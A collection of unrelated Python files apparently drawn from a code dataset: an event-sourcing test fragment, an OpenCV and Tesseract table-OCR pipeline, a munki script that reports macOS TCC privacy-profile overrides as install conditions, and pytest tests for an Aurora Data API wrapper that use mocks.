self.assertEqual(expected, observed)
def test_apply_diff(self):
diff = Event(
uuid=self.uuid,
name=Car.classname,
version=3,
action=Action.UPDATE,
created_at=self.final_datetime,
fields_diff=FieldDiffContainer([FieldDiff("doors", int, 5), FieldDiff("color", str, "yellow")]),
)
self.initial.apply_diff(diff)
self.assertEqual(self.final, self.initial)
def test_apply_diff_raises(self):
diff = Event(
uuid=self.uuid_another,
name=Car.classname,
version=3,
action=Action.UPDATE,
created_at=current_datetime(),
fields_diff=FieldDiffContainer([FieldDiff("doors", int, 5), FieldDiff("color", str, "yellow")]),
)
with self.assertRaises(ValueError):
self.initial.apply_diff(diff)
if __name__ == "__main__":
unittest.main()
|
413920
|
import os
import cv2
import imutils
import numpy as np
import matplotlib.pyplot as plt
import tesserocr as tr
from PIL import Image
class ImgProcess:
def __init__(self, filepath):
self.filepath = filepath
self.filename = os.path.basename(filepath)
self.filename_without_ext = os.path.splitext(self.filename)[0]
self.img = None
self.img_pre_processed = None
data_folder_name = "imgs"
self.img_pre_processed_filename = os.path.join(data_folder_name, "pre", f"{self.filename_without_ext}.png")
self.img_region_dir = os.path.join(data_folder_name, "regions")
self.img_region_list = []
self.img_region_marked_dir = os.path.join(data_folder_name, "region_marked")
self.img_table_lined_list = []
self.img_table_lined_dir = os.path.join(data_folder_name, "table_line")
self.img_item_dir = os.path.join(data_folder_name, "items")
self.img_item_list = []
self.img_region_item_marked_dir = os.path.join(data_folder_name, "item_marked")
self.img_item_sub_dir = os.path.join(data_folder_name, "items_sub")
self.img_item_sub_marked_dir = os.path.join(data_folder_name, "items_sub_marked")
self.img_ocr_marked_dir = os.path.join(data_folder_name, "img_ocr_marked")
self.img_regions_ocr_marked_dir = os.path.join(data_folder_name, "img_regions_ocr_marked")
def load_source(self):
self.img = cv2.imread(self.filepath)
def pre_process(self, thresh_mode):
# get rid of the color
pre = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
# Otsu threshold
pre = cv2.threshold(pre, 100, 255, thresh_mode | cv2.THRESH_OTSU)[1]
pre = ~pre
cv2.imwrite(self.img_pre_processed_filename, pre)
self.img_pre_processed = pre
def get_regions(self, save_in_file=False):
self.img_region_list.clear()
low_threshold = 50
high_threshold = 150
edges = cv2.Canny(self.img_pre_processed, low_threshold, high_threshold)
img_region_marked = np.copy(self.img)
img_region_marked_view = np.copy(self.img)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
hull_list = []
min_region = self.img.size // 100
for cnt in range(len(contours)):
epsilon = 0.01 * cv2.arcLength(contours[cnt], True)
approx = cv2.approxPolyDP(contours[cnt], epsilon, True)
corners = len(approx)
if corners in range(4, 10):
area = cv2.contourArea(contours[cnt])
if area > min_region:
hull = cv2.convexHull(contours[cnt])
hull_list.append(hull)
for cnt in range(len(hull_list)):
cv2.drawContours(img_region_marked, hull_list, cnt, (0, 0, 0), 5)
cv2.drawContours(img_region_marked_view, hull_list, cnt, (0, 0, 255), 10)
x, y, w, h = cv2.boundingRect(hull_list[cnt])
region = img_region_marked[y:y + h, x:x + w]
if region.shape[1] < 1000 or region.shape[0] < 1000:
scale_percent = 100 # percent of original size
if region.shape[1] < 1000:
scale_percent = 1000 // region.shape[1] * 100
else:
scale_percent = 1000 // region.shape[1] * 100
width = int(region.shape[1] * scale_percent / 100)
height = int(region.shape[0] * scale_percent / 100)
if width > 0 and height > 0:
dim = (width, height)
# resize image
resized = cv2.resize(region, dim, interpolation=cv2.INTER_AREA)
self.img_region_list.append(np.copy(resized))
else:
self.img_region_list.append(np.copy(region))
if save_in_file:
# save regions file
for i in range(len(self.img_region_list)):
cv2.imwrite(os.path.join(self.img_region_dir, f"{self.filename_without_ext}_{i}.png"),
self.img_region_list[i])
# save region marked file
path = os.path.join(self.img_region_marked_dir, f"{self.filename_without_ext}.png")
cv2.imwrite(path, img_region_marked_view)
plt.imshow(img_region_marked_view, cmap='gray')
plt.show()
return len(self.img_region_list)
def get_table(self):
def pre_process_region(region):
# get rid of the color
pre = cv2.cvtColor(region, cv2.COLOR_BGR2GRAY)
# Otsu threshold
pre = cv2.threshold(pre, 240, 255, cv2.THRESH_BINARY)[1]
pre = ~pre
return pre
for img_region in self.img_region_list:
pre = pre_process_region(img_region)
plt.imshow(pre)
plt.show()
ver_kernel_len = np.array(img_region).shape[0] // 30
hor_kernel_len = np.array(img_region).shape[1] // 20
# Defining a vertical kernel to detect all vertical lines of image
ver_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, ver_kernel_len))
# Defining a horizontal kernel to detect all horizontal lines of image
hor_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (hor_kernel_len, 1))
# A kernel of 2x1
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))
# Use vertical kernel to detect and save the vertical lines in a jpg
image_1 = cv2.erode(pre, ver_kernel, iterations=3)
vertical_lines = cv2.dilate(image_1, ver_kernel, iterations=3)
# Use horizontal kernel to detect and save the horizontal lines in a jpg
image_2 = cv2.erode(pre, hor_kernel, iterations=3)
horizontal_lines = cv2.dilate(image_2, hor_kernel, iterations=3)
# Combine horizontal and vertical lines in a new third image, with both having same weight.
img_vh = cv2.addWeighted(vertical_lines, 0.5, horizontal_lines, 0.5, 0.0)
# Eroding and thesholding the image
img_vh = cv2.erode(~img_vh, kernel, iterations=2)
thresh, img_vh = cv2.threshold(img_vh, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)
# connect broken line
kernel = np.ones((1, 5), np.uint8)
erosion = cv2.erode(img_vh, kernel, iterations=10)
dilate = cv2.dilate(erosion, kernel, iterations=10)
# kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (4, 1))
# morph_img = cv2.morphologyEx(dilate, cv2.MORPH_CLOSE, kernel)
result = dilate
self.img_table_lined_list.append(result)
plt.imshow(result, cmap='gray')
plt.show()
# save table line file
for i in range(len(self.img_table_lined_list)):
cv2.imwrite(os.path.join(self.img_table_lined_dir, f"{self.filename_without_ext}_{i}.png"),
self.img_table_lined_list[i])
def crop_by_table_line(self):
for table_img_index in range(len(self.img_table_lined_list)):
img_table_lined = self.img_table_lined_list[table_img_index]
low_threshold = 100
high_threshold = 255
img_region_marked = np.copy(self.img_region_list[table_img_index])
edges = cv2.Canny(~img_table_lined, low_threshold, high_threshold)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_L1)
for cnt in range(len(contours)):
# 轮廓逼近
epsilon = 0.01 * cv2.arcLength(contours[cnt], True)
approx = cv2.approxPolyDP(contours[cnt], epsilon, True)
corners = len(approx)
# if corners in range(4, 10):
ar = cv2.contourArea(contours[cnt])
if ar > (img_table_lined.size // 200):
cv2.drawContours(img_region_marked, contours, cnt, (255, 0, 0), 5)
hull = cv2.convexHull(contours[cnt])
x, y, w, h = cv2.boundingRect(hull)
c = self.img_region_list[table_img_index][y:y + h, x:x + w]
self.img_item_list.append(c)
self.img_item_list.reverse()
path = os.path.join(self.img_region_item_marked_dir,
f"{self.filename_without_ext}_{table_img_index}.png")
plt.imshow(img_region_marked, cmap='gray')
plt.show()
cv2.imwrite(path, img_region_marked)
for index in range(len(self.img_item_list)):
item = self.img_item_list[index]
path = os.path.join(self.img_item_dir, f"{self.filename_without_ext}_{index}.png")
cv2.imwrite(path, item)
def ocr(self):
s = ""
# item_text_list = []
# for i in range(len(self.img_item_list)):
# item = self.img_item_list[i]
# out = pytesseract.image_to_string(item)
# out_t = out.strip()
# if len(out_t) != 0:
# item_text_list.append(out_t)
# # s = s + f"\nitem {i}:\n" + out_t
# s = s + f"\n" + out_t
item_text_list = []
sub_list = []
with tr.PyTessBaseAPI(path='C:\\Program Files\\Tesseract-OCR\\tessdata\\', lang='eng') as api:
api.SetPageSegMode(tr.PSM.SPARSE_TEXT)
for i in range(len(self.img_item_list)):
item = self.img_item_list[i]
pil_img = Image.fromarray(cv2.cvtColor(item, cv2.COLOR_BGR2RGB))
api.SetImage(pil_img)
item_sub_marked = np.copy(item)
boxes = api.GetComponentImages(tr.RIL.PARA, True)
# get text
# text = api.GetUTF8Text()
# print(text)
# iterate over returned list, draw rectangles
for (im, box, _, _) in boxes:
x, y, w, h = box['x'], box['y'], box['w'], box['h']
cv2.rectangle(item_sub_marked, (x, y), (x + w, y + h), color=(0, 0, 255))
path = os.path.join(self.img_item_sub_marked_dir, f"{self.filename_without_ext}_{i}.png")
cv2.imwrite(path, item_sub_marked)
for i in range(len(sub_list)):
path = os.path.join(self.img_item_sub_dir, f"{self.filename_without_ext}_{i}.png")
cv2.imwrite(path, sub_list[i])
print(f"{self.filename_without_ext}============")
print(s)
print("============")
def ocr_whole(self):
with tr.PyTessBaseAPI(path='C:\\Program Files\\Tesseract-OCR\\tessdata\\', lang='eng') as api:
api.SetPageSegMode(tr.PSM.AUTO_OSD)
item = self.img
pil_img = Image.fromarray(cv2.cvtColor(item, cv2.COLOR_BGR2RGB))
api.SetImage(pil_img)
item_sub_marked = np.copy(item)
boxes = api.GetComponentImages(tr.RIL.BLOCK, True)
# get text
# text = api.GetUTF8Text()
# print(text)
# iterate over returned list, draw rectangles
for (im, box, _, _) in boxes:
x, y, w, h = box['x'], box['y'], box['w'], box['h']
cv2.rectangle(item_sub_marked, (x, y), (x + w, y + h), color=(0, 0, 255))
# out = pytesseract.image_to_string(~resized_afterd, lang='eng', config='--psm 3')
# out_t = out.strip()
# if len(out_t) != 0:
# item_text_list.append(out_t)
# # s = s + f"\nitem {i}:\n" + out_t
# s = s + f"\n" + out_t
path = os.path.join(self.img_ocr_marked_dir, f"{self.filename_without_ext}.png")
cv2.imwrite(path, item_sub_marked)
plt.show()
def ocr_regions(self):
def pre_process_region(region):
# get rid of the color
pre = cv2.cvtColor(region, cv2.COLOR_BGR2GRAY)
# Otsu threshold
# pre = cv2.threshold(pre, 200, 255, cv2.THRESH_BINARY)[1]
return pre
with tr.PyTessBaseAPI(
path='C:\\Program Files\\Tesseract-OCR\\tessdata\\', lang='eng', psm=tr.PSM.AUTO,
oem=tr.OEM.LSTM_ONLY) as api:
api.SetPageSegMode(tr.PSM.SINGLE_COLUMN)
for i in range(len(self.img_region_list)):
item = pre_process_region(self.img_region_list[i])
pil_img = Image.fromarray(item)
api.SetImage(pil_img)
item_sub_marked = np.copy(item)
boxes = api.GetComponentImages(tr.RIL.BLOCK, True)
# get text
text = api.GetUTF8Text()
print(text)
# iterate over returned list, draw rectangles
for (im, box, _, _) in boxes:
x, y, w, h = box['x'], box['y'], box['w'], box['h']
cv2.rectangle(item_sub_marked, (x, y), (x + w, y + h), color=(0, 0, 255))
path = os.path.join(self.img_regions_ocr_marked_dir, f"{self.filename_without_ext}_{i}.png")
cv2.imwrite(path, item_sub_marked)
if __name__ == "__main__":
source_dir = os.path.join("imgs", "source")
dir_list = os.listdir(source_dir)
thresh_modes = [cv2.THRESH_BINARY_INV, cv2.THRESH_BINARY, cv2.THRESH_TRUNC]
for cur_file in dir_list:
source_file = os.path.join(source_dir, cur_file)
in_file = source_file
img = ImgProcess(source_file)
img.load_source()
img.ocr_whole()
region_count = 0
max_index = -1
max_region_count = 0
for thresh_mode_index in range(len(thresh_modes)):
thresh_mode = thresh_modes[thresh_mode_index]
img.pre_process(thresh_mode)
region_count = img.get_regions()
if region_count > max_region_count:
max_index = thresh_mode_index
max_region_count = region_count
if max_region_count == 0:
continue
img.pre_process(thresh_modes[max_index])
img.get_regions(True)
img.ocr_regions()
img.get_table()
img.crop_by_table_line()
img.ocr()
print(f"Done {cur_file}")
|
413965
|
import os
try:
from munkicon import plist
from munkicon import worker
except ImportError:
from .munkicon import plist
from .munkicon import worker
# Keys: 'tcc_accessibility'
# 'tcc_address_book'
# 'tcc_apple_events'
# 'tcc_calendar'
# 'tcc_camera'
# 'tcc_file_provider_presence'
# 'tcc_listen_event'
# 'tcc_media_library'
# 'tcc_microphone'
# 'tcc_photos'
# 'tcc_post_event'
# 'tcc_reminders'
# 'tcc_screen_capture'
# 'tcc_speech_recognition'
# 'tcc_all_files'
# 'tcc_desktop_folder'
# 'tcc_documents_folder'
# 'tcc_downloads_folder'
# 'tcc_network_volumes'
# 'tcc_removable_volumes'
# 'tcc_sys_admin_files'
class PPPCPConditions(object):
"""PPPCP Profiles"""
def __init__(self):
self.conditions = self._process()
def _parse_item(self, obj):
"""Parse PPPCP object."""
result = {'ae_identifier': obj.get('AEReceiverIdentifier', None),
'identifier': obj.get('Identifier', None),
'auth': None}
# macOS 11+ introduces replacement of bool 'Allowed' with 'Authorization'
# which has three values: 'Allow', 'Deny', 'AllowStandardUserToSetSystemService'
# So look for 'Authorization' first then check for the bool 'Allowed' and if
# 'Allowed' is present, map back the bool to 'Allow' for 'True' and 'Deny'
# for 'False'.
try:
_auth = obj['Authorization']
except KeyError:
_auth = 'Allow' if obj['Allowed'] else 'Deny'
# Make the 'AllowStandardUserToSetSystemService' a little easier to type
# in munki conditionals statements.
if _auth == 'AllowStandardUserToSetSystemService':
_auth = 'allow_standard_user'
result['auth'] = _auth.lower()
return result
def _pppcp_overrides(self):
"""Returns PPPCP identifiers from MDM overrides."""
result = dict()
# TCC Map
_ktcc_map = {'kTCCServiceAccessibility': 'tcc_accessibility',
'kTCCServiceAddressBook': 'tcc_address_book',
'kTCCServiceAppleEvents': 'tcc_apple_events',
'kTCCServiceCalendar': 'tcc_calendar',
'kTCCServiceCamera': 'tcc_camera',
'kTCCServiceFileProviderPresence': 'tcc_file_provider_presence',
'kTCCServiceListenEvent': 'tcc_listen_event',
'kTCCServiceMediaLibrary': 'tcc_media_library',
'kTCCServiceMicrophone': 'tcc_microphone',
'kTCCServicePhotos': 'tcc_photos',
'kTCCServicePostEvent': 'tcc_post_event',
'kTCCServiceReminders': 'tcc_reminders',
'kTCCServiceScreenCapture': 'tcc_screen_capture',
'kTCCServiceSpeechRecognition': 'tcc_speech_recognition',
'kTCCServiceSystemPolicyAllFiles': 'tcc_all_files',
'kTCCServiceSystemPolicyDesktopFolder': 'tcc_desktop_folder',
'kTCCServiceSystemPolicyDocumentsFolder': 'tcc_documents_folder',
'kTCCServiceSystemPolicyDownloadsFolder': 'tcc_downloads_folder',
'kTCCServiceSystemPolicyNetworkVolumes': 'tcc_network_volumes',
'kTCCServiceSystemPolicyRemovableVolumes': 'tcc_removable_volumes',
'kTCCServiceSystemPolicySysAdminFiles': 'tcc_sys_admin_files'}
# Generate the results keys to return.
for _k, _v in _ktcc_map.items():
result[_v] = list()
_mdmoverrides = '/Library/Application Support/com.apple.TCC/MDMOverrides.plist'
if os.path.exists(_mdmoverrides):
_overrides = plist.readPlist(path=_mdmoverrides)
if _overrides:
for _item, _payload in _overrides.items():
for _k, _v in _payload.items():
_tcc_type = _ktcc_map[_k]
# Apple Events has a deeper nesting structure.
if _k == 'kTCCServiceAppleEvents':
# There might be multiple dictionaries in the value for 'kTCCServiceAppleEvents'
# I really hope not :|
for _id, _vals in _v.items():
_entry = self._parse_item(_vals)
_ae_id = _entry.get('ae_identifier', None)
_auth = _entry.get('auth', None)
_id = _entry.get('identifier', None)
# Only add if there's an identifier
if _ae_id and _auth and _id:
_tcc_str = '{},{},{}'.format(_auth, _id, _ae_id)
if _tcc_str not in result[_tcc_type]:
result[_tcc_type].append(_tcc_str)
else:
_entry = self._parse_item(_v)
_ae_id = _entry.get('ae_identifier', None)
_auth = _entry.get('auth', None)
_id = _entry.get('identifier', None)
# Only add if there's an identifier
if _auth and _id:
_tcc_str = '{},{}'.format(_auth, _id)
if _tcc_str not in result[_tcc_type]:
result[_tcc_type].append(_tcc_str)
return result
def _process(self):
"""Process all conditions and generate the condition dictionary."""
result = dict()
result.update(self._pppcp_overrides())
return result
def runner(dest):
pppcp = PPPCPConditions()
mc = worker.MunkiConWorker(conditions_file=dest, log_src=__file__)
mc.write(conditions=pppcp.conditions)
|
413981
|
from collections import namedtuple
import camus
from unittest import mock
from pytest import raises
IdRecord = namedtuple("IdRecord", "id")
def check_id(i, row):
assert row.id == i
class MockAurora:
def begin_transaction(self, secretArn, resourceArn, database):
return {"transactionId": "transactionId"}
def commit_transaction(self, secretArn, resourceArn, transactionId):
raise Exception("commit_transaction_error")
def rollback_transaction(self, secretArn, resourceArn, transactionId):
pass
def execute_statement(self, secretArn, resourceArn, database, sql, includeResultMetadata, transactionId, parameters=None):
return {"numberOfRecordsUpdated": 0}
class TestRecordCollection:
def test_iter(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
for i, row in enumerate(rows):
check_id(i, row)
def test_next(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
for i in range(10):
check_id(i, next(rows))
def test_iter_and_next(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
i = enumerate(iter(rows))
check_id(*next(i)) # Cache first row.
next(rows) # Cache second row.
check_id(*next(i)) # Read second row from cache.
def test_multiple_iter(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
i = enumerate(iter(rows))
j = enumerate(iter(rows))
check_id(*next(i)) # Cache first row.
check_id(*next(j)) # Read first row from cache.
check_id(*next(j)) # Cache second row.
check_id(*next(i)) # Read second row from cache.
def test_slice_iter(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
for i, row in enumerate(rows[:5]):
check_id(i, row)
for i, row in enumerate(rows):
check_id(i, row)
assert len(rows) == 10
# all
def test_all_returns_a_list_of_records(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(3))
assert rows.all() == [IdRecord(0), IdRecord(1), IdRecord(2)]
# first
def test_first_returns_a_single_record(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(1))
assert rows.first() == IdRecord(0)
def test_first_defaults_to_None(self):
rows = camus.RecordCollection(iter([]))
assert rows.first() is None
def test_first_default_is_overridable(self):
rows = camus.RecordCollection(iter([]))
assert rows.first("Cheese") == "Cheese"
def test_first_raises_default_if_its_an_exception_subclass(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.first, Cheese)
def test_first_raises_default_if_its_an_exception_instance(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.first, Cheese("cheddar"))
# one
def test_one_returns_a_single_record(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(1))
assert rows.one() == IdRecord(0)
def test_one_defaults_to_None(self):
rows = camus.RecordCollection(iter([]))
assert rows.one() is None
def test_one_default_is_overridable(self):
rows = camus.RecordCollection(iter([]))
assert rows.one("Cheese") == "Cheese"
def test_one_raises_when_more_than_one(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(3))
raises(ValueError, rows.one)
def test_one_raises_default_if_its_an_exception_subclass(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.one, Cheese)
def test_one_raises_default_if_its_an_exception_instance(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.one, Cheese("cheddar"))
# scalar
def test_scalar_returns_a_single_record(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(1))
assert rows.scalar() == 0
def test_scalar_defaults_to_None(self):
rows = camus.RecordCollection(iter([]))
assert rows.scalar() is None
def test_scalar_default_is_overridable(self):
rows = camus.RecordCollection(iter([]))
assert rows.scalar("Kaffe") == "Kaffe"
def test_scalar_raises_when_more_than_one(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(3))
raises(ValueError, rows.scalar)
class TestRecord:
def test_record_dir(self):
keys, values = ["id", "name", "email"], [1, "", ""]
record = camus.Record(keys, values)
_dir = dir(record)
for key in keys:
assert key in _dir
for key in dir(object):
assert key in _dir
def test_record_duplicate_column(self):
keys, values = ["id", "name", "email", "email"], [1, "", "", ""]
record = camus.Record(keys, values)
with raises(KeyError):
record["email"]
@mock.patch("camus.boto3")
class TestTransaction:
def test_raise(self, boto3):
payload = {
"secret_arn": 'arn:aws:secretsmanager:us-east-1:123456789012:secret:your-secret-name-ByH87J',
"resource_arn": 'arn:aws:rds:us-east-1:123456789012:cluster:your-cluster-name',
"dbname": 'testing'
}
aurora = MockAurora()
db = camus.Database(**payload, conn=aurora)
with raises(Exception, match="commit_transaction_error"):
with db.transaction() as txid:
db.query("SELECT * FROM teste")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.